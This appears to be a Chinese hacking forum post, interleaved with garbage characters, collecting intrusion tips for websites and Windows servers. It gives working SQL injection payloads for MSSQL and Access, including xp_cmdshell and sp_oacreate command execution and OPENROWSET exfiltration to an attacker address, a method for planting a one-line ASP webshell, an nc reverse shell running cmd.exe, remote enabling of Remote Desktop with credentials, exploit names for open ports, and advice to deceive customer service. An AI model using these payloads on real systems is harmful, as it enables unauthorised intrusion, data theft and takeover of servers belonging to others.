SA点数据库分离技术相关6 j+ A, G; X* s( a" S K2 O
h1 S5 o+ O2 Y
8 k( o1 k+ H" J; S) y; LSA点数据库分离搞法+语句: N. t( V4 y4 o' m6 z: P+ W
' u$ T' H# E7 }. @# ]: q
注射点不显错,执行下面三条语句页面都返回正常。7 Z/ g0 r9 j% \, \; q6 c
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
: `4 x! @+ h p" D* W- Z. Hand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')9 I# v0 u9 Q. g; Q Q
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: \# a" k2 L H9 W5 w可以列目录,判断系统为2000,web与数据库分离
_$ ]6 O) {, C. V+ y8 n遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。2 j9 W0 P {7 P, c- S; k, f* ^
在注射点上执行7 E2 T" B: M6 F2 [% k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
5 F9 w2 V& H, U' L+ D1 D9 `; a页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
& a' G4 i z8 i7 z& u/ \' m9 I还有我用NC监听得其他端口都没有得到IP。
( L- _1 W+ |2 I+ |1 D' W. C
, b: b0 O6 V0 E$ q5 J通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
' i, ^0 r: N8 p3 R7 X) d'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--# {( [ v7 Q2 |5 I5 P$ A6 |
- Z- I8 H1 u2 q" P# m$ X;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--% @, E! t) t4 a a
4 g0 W9 V# y, ?" S
现在就猜想是不是数据库是内网而且不能连外网。0 Y: _" ~5 V2 L
8 f% s# U, P* o0 E. y* W8 \7 u7 `/ h& ?+ Z! l9 O, q0 p; @6 d
access导出txt文本代码
0 h' B" B8 L9 ?6 M. h* o. i8 A. JSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
# v2 H' \7 E9 C, s7 v
! H3 g5 L% z+ l6 t% m0 |4 v% C
5 i4 k' g8 b7 z
自动跳转到指定网站代码头
$ Q- Z; S" j1 x' M. V4 a1 h0 h<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>! J* E6 g k; s0 ~: w; ~: g1 @
# W) I! s) N0 I4 L# f Q% o, a% `4 }: q9 W
入侵java or jsp站点时默认配置文件路径:/ I( m. O0 f- Q6 |
\web-inf\web.xml# U2 @' _: k t* Q
tomcat下的配置文件位置:9 @ {6 Z1 E$ p! P; v, o, M
\conf\server.xml (前面加上tomcat路径)! U/ ^0 n1 U H8 x
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 E, P; _) W4 [
% |* h& c. l* @' j" l+ ~( i5 d9 B3 w( B' X7 b
' S' J, a$ E+ R检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
/ W7 c! A0 w6 d. l, ]-1%23
* T q8 f& l2 G. m( V0 q>
! |3 ~- i1 u" k<
" A8 t7 L* v1 ^' t. k1'+or+'1'='1) O; a; m' G- T" U
id=8%bf5 ^" N, W5 q J- ]+ k W9 V5 q
9 y `6 r i) R: m
全新注入点检测试法:
# A, r6 t: Y7 P; l% {" v* c! I& `- U在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。& Q }5 M1 G# [/ x
6 _/ _6 k8 j6 V8 I# i6 `( M) {6 J在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。$ N4 w* |# ]9 p0 j; ^7 g8 P n9 [9 K
) n( w W n7 b' J
搜索型注入判断方法:
& z$ ~& w; q6 ^6 `9 k/ i北京%' and '1'='1' and '%'='. ^! g( c; K; |, T# H/ [: H! N- {
北京%' and '1'='2' and '%'='
4 W% q( d" i @9 z0 f8 ^& I
) l( J3 v# ?1 U& N/ A) f9 w7 h+ {2 x3 W, c. a
COOKIES注入:
" {% [! z! v1 O" w+ w7 }. n; ]
$ S2 V) A* I9 `& B# A6 {8 rjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
3 m" P5 d/ ^& [" a6 T8 m5 z
3 |* J* ~! _+ M4 e1 @2000专业版查看本地登录用户命令:% H" M& M. }* n
net config workstation+ [2 O8 |% W$ M, u# A
$ t: m1 P* f f S+ J0 X# N. u- r: E
- g9 N% ~3 K* ]7 f2003下查看ipsec配置和默认防火墙配置命令:; L8 Q. N' ]: ^) [2 `
netsh firewall show config
2 o& C3 q" Q6 I* g* d# ]netsh ipsec static show all- `* ?& M1 X+ D/ N
5 \3 D% c7 C% R0 K: ]: Q不指派指定策略命令:
9 a# u+ b3 Q" ^: O2 snetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
% s0 d6 ~8 N$ J! R% _" l7 z: S% q2 mnetsh ipsec static show policy all 显示策略名: w! Z) B% _+ d/ }3 `7 Q8 d
" `% _1 N9 @& D: F# B/ E' W
& @& a- _) `1 ^* E猜管理员后台小技巧:
/ g0 t( N$ } w7 I, L1 K) Padmin/left.asp
" N5 q/ | z% N# T$ Iadmin/main.asp
3 c0 w; D. F! radmin/top.asp
% J5 J9 W- u6 ^/ Xadmin/admin.asp ' F% q8 s2 e2 v F! S% y
会现出菜单导航,然后迅雷下载全部链接$ f/ f& t' z% X4 h, h; I1 b
$ _1 i: D9 B; ?+ {; A
" x# i( a1 w3 Y) ^社会工程学:
' w0 U7 T& n) B8 ?用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ _& I7 n4 c* t. |0 X- N
然后去骗客服
2 K4 T, s! }2 m' p8 E
' N2 D+ S$ c4 o. P4 u0 O7 R7 X; \6 U8 S @* Z3 _8 ~$ w
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 5 z7 }; p; b! D- E$ [: [( Q
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ( W9 ^% H" y- h' l( y0 ^3 j
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。7 n% K9 S3 x6 F) O) r$ I6 ~, [
) c& o k# R% e0 c5 A, v# s% V' w; U7 U
8 @# Y9 z& R( ^& B
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( F& x W* C7 t+ X* W) w; H
0 o i( O% I8 c! \ x7 y6 \/ Z7 _6 [7 w ^& o1 S5 v/ o% F
2 A3 ]8 W6 t `& n
CMD加密注册表位置
" ~: W" r8 ~) n9 }(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor1 U$ P5 B" T, Q5 ]+ T& }+ a% M
AutoRun
4 J- G3 J8 T% u* F H3 N# Y4 C, m! ?0 j: I p5 X1 D5 ~$ F
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor8 B, Y$ z& v u: v3 ?- d! Z, P
AutoRun
7 ?7 [ k2 Z7 N0 r B$ T$ u" _) M/ C! X
" I$ a3 x- S, I$ {& T在找注入时搜索Hidden,把他改成test
9 z- K1 F7 j4 W: H7 C8 T% ~ i
" k/ q8 [+ d/ ?$ t3 ^: }$ G( q
4 i: D- A, Z1 M/ J- t
% b9 E: T' e# R7 g) a7 o. T! Umstsc /v:IP /console
( x2 h S1 i" J. F. ^0 h' s* l, u5 ?* m- w6 @
" { X3 i1 F. t. A
一句话开3389:
& N: v8 g9 o% Y; [1 f* M% q0 z! k9 H! I/ u. f3 Z* i
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
* B- ?! J4 d' `5 B; k3 M/ `开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.( {6 s- U% O" t; K
5 f3 @$ _6 T! L& L' Y: I; h
+ u! a# p/ A6 i4 C, [- o$ s知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:, J3 X& `/ K" p5 T, B9 x
Insert into admin(user,pwd) values('test','test')* e3 ]% A/ @) [, q# A, L
$ b7 J \! C+ l+ l! O5 v6 E
& F* |2 a0 w. I% r: H0 T' ONC反弹
2 v" N2 X7 j8 P# _/ U9 V先在本机执行: nc -vv -lp 监听的端口 (自己执行) - U( ?5 {5 J! m. C$ f! h9 K4 w
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 o& o7 L: ]3 `# V8 u
5 T* f" }; \ a! F
, U1 I m) L& H' j0 h2 {
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题0 K$ u0 Q/ m Z2 L
* g q3 p0 z e. u6 g$ k) I
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
( P" X6 W* x: T% I+ c例如:
; p- y* ?$ V0 u( V, Isubst k: d:\www\ 用d盘www目录替代k盘# r; q+ b2 g9 e5 b4 h9 B
subst k: /d 解除K盘代替 |